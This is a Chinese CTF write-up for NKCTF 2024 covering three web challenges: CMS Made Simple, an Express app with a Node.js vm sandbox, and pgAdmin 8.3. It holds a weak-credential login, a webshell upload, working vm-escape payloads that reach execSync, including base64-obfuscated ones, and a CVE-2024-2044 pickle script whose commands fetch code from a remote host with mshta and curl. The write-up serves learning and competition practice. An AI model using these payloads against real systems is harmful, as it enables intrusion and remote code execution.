2024NKCTF_WP

在大家的一同努力之下获取了第四

欸，好爽

my first cms

打开看到是个cms 网上搜了一圈是CMSMS

一个php+mysql+smarty写的cms

dirsearch扫描一下，看到存在admin/login.php路由，直接简单访问

弱密码 admin/Admin123成功登录

出题人卡字典，良心大大滴坏

网上搜搜这个cms的漏洞

看到两个可能的

https://github.com/capture0x/CMSMadeSimple

和capture0x/CMSMadeSimple2: CMS Made Simple Version: 2.2.19 - SSTI (github.com)

注意到使用ssti注入的时候会遇到一个setting，绕不过去

前面那个可以

没有办法直接读取文件，尝试写马

antsword链接

全世界最简单的CTF

访问/secret获取源码


const express = require('express');
const bodyParser = require('body-parser');
const app = express();
const fs = require("fs");
const path = require('path'); 
const vm = require("vm");

app
.use(bodyParser.json())
.set('views', path.join(__dirname, 'views'))
.use(express.static(path.join(__dirname, '/public')))

app.get('/', function (req, res){
    res.sendFile(__dirname + '/public/home.html');
})


function waf(code) {
    let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g;
    if(code.match(pattern)){
        throw new Error("what can I say? hacker out!!");
    }
}

app.post('/', function (req, res){
        let code = req.body.code;
        let sandbox = Object.create(null);
        let context = vm.createContext(sandbox);
        try {
            waf(code)
            let result = vm.runInContext(code, context);
            console.log(result);
        } catch (e){
            console.log(e.message);
            require('./hack');
        }
})

app.get('/secret', function (req, res){
    if(process.__filename == null) {
        let content = fs.readFileSync(__filename, "utf-8");
        return res.send(content);
    } else {
        let content = fs.readFileSync(process.__filename, "utf-8");
        return res.send(content);
    }
})


app.listen(3000, ()=>{
    console.log("listen on 3000");
})

vm逃逸过滤了很多东西

存在try catch方法应该是使用proxy方法，报错执行

`
    throw new Proxy({}, {
        get: function(){
            const cc = arguments.callee.caller;
            const p = (cc.constructor.constructor('return process'))();
            return p.mainModule.require('child_process').execSync('whoami').toString();
        }
    })
`

通过污染tostring属性和proxy报错回显，完成一个注入

注意到

app.get('/secret', function (req, res){
    if(process.__filename == null) {
        let content = fs.readFileSync(__filename, "utf-8");
        return res.send(content);
    } else {
        let content = fs.readFileSync(process.__filename, "utf-8");
        return res.send(content);
    }
})

我们可以利用process污染__filename属性达到读取任意文件的目的

const vm = require("vm");

function waf(code) {
    let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g;
    if(code.match(pattern)){
        throw new Error("what can I say? hacker out!!");
    }
}

const script = 
`(() => {
      throw new Proxy({}, {
        get: function(){
          const c = arguments.callee.caller;
          const p = (c.constructor.constructor('return pr'%2b'ocess'))();
          p.__filename = "/flag";
          return "\\n";
       }
      })
      })()`;


let sandbox = Object.create(null);
let context = vm.createContext(sandbox);
// let process.__filename='test';

//  console.log(process.__filename);

try {
    //  waf(code)
    const result = vm.runInContext(script, context);
     console.log('test'+result);
 } catch (e){
    console.log('fail'+e.message);
   
}
console.log(process.__filename);

现在问题来到了怎么绕过

正常的+ [] join啥的都寄了，没法绕过

https://www.zhangshengrong.com/p/bYXxqOkL1Z/

参考这个文章，base64绕过，读取文件

  get: function() {
    const cc = arguments.callee.caller;
    const global = (cc.constructor.constructor('return global'))();
    const pp = Reflect.get(Object.values(Reflect.get(global, Reflect.ownKeys(global).find(x=>x.startsWith(`Buf`)))),1)(`cmV0dXJuIHByb2Nlc3M=`,`base64`).toString();
    const p = (cc.constructor.constructor(pp))();
    p.__filename="/flag";
  }
})

ok读取不到，看来要rce

测试了一下，好像不出我网，考虑echo读取文件之后，污染相关的__filename读取文件

throw new Proxy({}, {
    get: function() {
      const cc = arguments.callee.caller;
      const global = (cc.constructor.constructor('return global'))();
      const return_Process = Reflect.get(Object.values(Reflect.get(global, Reflect.ownKeys(global).find(x=>x.startsWith(`Buf`)))),1)(`cmV0dXJuIHByb2Nlc3M=`,`base64`).toString();
      const Process = (cc.constructor.constructor(return_Process))();
      Process.__filename="1";
      const re = Reflect.get(global, Reflect.ownKeys(global).find(x=>x.includes('eva')));
      const an = Reflect.get(Object.values(Reflect.get(global, Reflect.ownKeys(global).find(x=>x.startsWith(`Buf`)))),1)(`Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZCgiY2hpbGRfcHJvY2VzcyIpLmV4ZWNTeW5jKCIvcmVhZGZsYWcgPjEiKQ==`,`base64`).toString();
      re(an);
    }
  })

然后访问/secret即可

分析

此题目实际上是出网的，只是忘记了[]被过滤，网上看到很多的师傅也是成功的弹shell穿了这个题目

arguments.callee.caller可以获取沙箱外的一个对象，外面可以利用这个点完成攻击

porcess显然是没有这个__filename的对象的，所以回去prototype里面去寻找相关的__filename去寻找通过’./hack.js’ 然后污染shell.js的内容完成rce

解题方法还是很多的，欢迎大家讨论

tacooooo

hint给了提示是attack_tacooooo，猜测密码就是tacooooo 直接登录

发现是pgAdminv8.3

搜获cve Unsafe Deserialization and Remote Code Execution by an Authenticated user in pgAdmin 4 (CVE-2024-2044) · Issue #7258 · pgadmin-org/pgadmin4 (github.com)

直接下载一个脚本

import struct
import sys

def produce_pickle_bytes(platform, cmd):
    b = b'\x80\x04\x95'
    b += struct.pack('L', 22 + len(platform) + len(cmd))
    b += b'\x8c' + struct.pack('b', len(platform)) + platform.encode()
    b += b'\x94\x8c\x06system\x94\x93\x94'
    b += b'\x8c' + struct.pack('b', len(cmd)) + cmd.encode()
    b += b'\x94\x85\x94R\x94.'
    print(b)
    return b

if __name__ == '__main__':
    if len(sys.argv) != 2:
        exit(f"usage: {sys.argv[0]} ip:port")
    with open('nt.pickle', 'wb') as f:
        f.write(produce_pickle_bytes('nt', f"mshta.exe http://{HOST}/"))
    with open('posix.pickle', 'wb') as f:
        f.write(produce_pickle_bytes('posix', f"curl http://{HOST}/"))

题目表示无bash 无curl

./busybox sh可以这样

在环境变量内找到flag

用过就是熟悉

mvc架构的php审计，先放着，学了在拿来分析